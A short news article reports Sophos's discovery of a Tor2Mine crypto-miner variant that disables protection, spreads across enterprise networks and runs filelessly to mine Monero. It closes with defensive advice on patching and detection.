This crypto malware can proceed both with files and filelessly.
It has been discovered by cybersecurity firm Sophos that a crypto malware can leech and use all your network to mine the privacy coin Monero.
The firm says that a new variant of the Tor2Mine crypto-miner malware is exploiting enterprise networks to mine Monero (XMR).
Tor2Mine uses a PowerShell script that disables malware protection so that it doesn’t get detected.
What makes it more insidious is that it can even proceed filelessly.
On the systems where it gathers the credentials, Tor2Mine installs executables as a service. Post that, it searches for other systems or devices on the network to execute installation scripts so that it can spread further.
In case it is not able to gather the administrative credentials and privileges, Tor2Mine can execute filelessly through executable commands by running them as scheduled tasks.
In recent cases, it was also observed that “the same defensive gaps that allow miners to spread can lead to data and credential theft, as well as ransomware.”
It is recommended to patch software vulnerabilities on Internet-facing systems. Organizations which do that are far less likely to be infected with coin miners. Moreover, coin miners are “usually easily detected by antimalware products—particularly those that leverage Windows’ Anti-Malware Software Interface to spot scripts intended to shut down malware protection.”
Proactive action is always better than reactive action. So, regular security checks are a must in order to shield the network from such attacks. Once a network is infected by crypto malware, sometimes it becomes excruciatingly difficult to get rid of it.
News recommendation: India May Regulate, Not Ban Crypto Say Sources